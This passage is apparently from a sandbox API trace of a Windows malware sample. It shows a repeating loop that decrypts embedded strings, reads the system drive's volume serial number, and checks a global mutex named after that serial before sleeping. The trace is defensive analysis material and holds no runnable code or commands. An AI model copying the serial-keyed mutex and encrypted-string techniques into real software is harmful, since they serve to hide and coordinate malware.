hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0197.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0197.073] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0197.073] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0197.073] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0197.073] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0197.073] CryptDestroyKey (hKey=0x29c020) returned 1 [0197.073] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0197.073] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0197.073] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0197.073] CloseHandle (hObject=0x1c0) returned 1 [0197.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0197.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0197.073] Sleep (dwMilliseconds=0x3e8) [0198.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0198.293] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0198.293] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0198.293] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0198.293] CryptDestroyKey (hKey=0x29c020) returned 1 [0198.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0198.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0198.293] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0198.293] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0198.293] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0198.293] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0198.293] CryptDestroyKey (hKey=0x29c020) returned 1 [0198.293] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0198.293] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0198.293] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0198.293] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0198.293] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0198.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0198.294] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0198.294] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0198.294] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0198.294] CryptDestroyKey (hKey=0x29c020) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0198.294] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0198.294] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0198.294] CloseHandle (hObject=0x1c0) returned 1 [0198.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0198.294] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0198.294] Sleep (dwMilliseconds=0x3e8) [0199.355] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0199.355] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0199.355] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0199.355] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0199.355] CryptDestroyKey (hKey=0x29c020) returned 1 [0199.355] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0199.355] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0199.355] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0199.355] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0199.355] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0199.355] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0199.355] CryptDestroyKey (hKey=0x29c020) returned 1 [0199.355] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0199.355] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0199.355] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0199.355] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0199.355] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0199.356] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0199.356] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0199.356] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0199.356] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0199.356] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0199.356] CryptDestroyKey (hKey=0x29c020) returned 1 [0199.356] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0199.356] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0199.356] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0199.356] CloseHandle (hObject=0x1c0) returned 1 [0199.356] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0199.356] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0199.357] Sleep (dwMilliseconds=0x3e8) [0200.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0200.485] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0200.485] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0200.485] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0200.485] CryptDestroyKey (hKey=0x29c020) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0200.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0200.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0200.485] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0200.485] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0200.485] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0200.485] CryptDestroyKey (hKey=0x29c020) returned 1 [0200.485] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0200.485] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0200.485] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0200.485] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0200.485] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0200.485] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0200.486] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0200.486] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0200.486] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0200.486] CryptDestroyKey (hKey=0x29c020) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0200.486] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0200.486] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0200.486] CloseHandle (hObject=0x1c0) returned 1 [0200.486] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0200.486] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0200.486] Sleep (dwMilliseconds=0x3e8) [0201.630] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0201.630] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0201.630] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0201.630] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0201.630] CryptDestroyKey (hKey=0x29c020) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0201.631] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0201.631] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0201.631] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0201.631] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0201.631] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0201.631] CryptDestroyKey (hKey=0x29c020) returned 1 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0201.631] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0201.631] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0201.631] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0201.631] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0201.631] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0201.631] CryptDestroyKey (hKey=0x29c020) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0201.631] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0201.631] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0201.631] CloseHandle (hObject=0x1c0) returned 1 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0201.631] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0201.631] Sleep (dwMilliseconds=0x3e8) [0202.639] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0202.639] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0202.639] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0202.639] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0202.639] CryptDestroyKey (hKey=0x29c020) returned 1 [0202.639] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0202.639] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0202.639] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0202.639] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0202.639] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0202.639] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0202.639] CryptDestroyKey (hKey=0x29c020) returned 1 [0202.639] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0202.639] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9690, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0202.639] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0202.639] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0202.639] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.639] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0202.639] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0202.640] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0202.640] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0202.640] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0202.640] CryptDestroyKey (hKey=0x29c020) returned 1 [0202.640] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0202.640] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0202.640] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0202.640] CloseHandle (hObject=0x1c0) returned 1 [0202.640] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0202.640] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0202.640] Sleep (dwMilliseconds=0x3e8) [0203.656] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9690 [0203.657] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0203.657] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0203.657] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9690, pdwDataLen=0x200faf4 | out: pbData=0x1db9690, pdwDataLen=0x200faf4) returned 1 [0203.657] CryptDestroyKey (hKey=0x29c020) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9668 [0203.657] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0203.657] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0203.657] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0203.657] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0203.657] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0203.657] CryptDestroyKey (hKey=0x29c020) returned 1 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0203.657] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9668, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db96b8 | out: hHeap=0x1db0000) returned 1 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9690 | out: hHeap=0x1db0000) returned 1 [0203.657] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9668 | out: hHeap=0x1db0000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db5748 [0203.657] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0203.657] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0203.657] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5748, pdwDataLen=0x200fb28 | out: pbData=0x1db5748, pdwDataLen=0x200fb28) returned 1 [0203.657] CryptDestroyKey (hKey=0x29c020) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db54e8 [0203.657] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0203.657] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0203.657] CloseHandle (hObject=0x1c0) returned 1 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5748 | out: hHeap=0x1db0000) returned 1 [0203.657] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0203.657] Sleep (dwMilliseconds=0x3e8) [0204.761] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9668 [0204.761] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0204.761] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0204.761] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9668, pdwDataLen=0x200faf4 | out: pbData=0x1db9668, pdwDataLen=0x200faf4) returned 1 [0204.761] CryptDestroyKey (hKey=0x29c020) returned 1 [0204.761] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9690 [0204.761] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db96b8 [0204.761] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0204.761] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0204.762] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0204.762] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0204.762] CryptDestroyKey (hKey=0x29c020) returned 1 [0204.762] HeapFree (in: 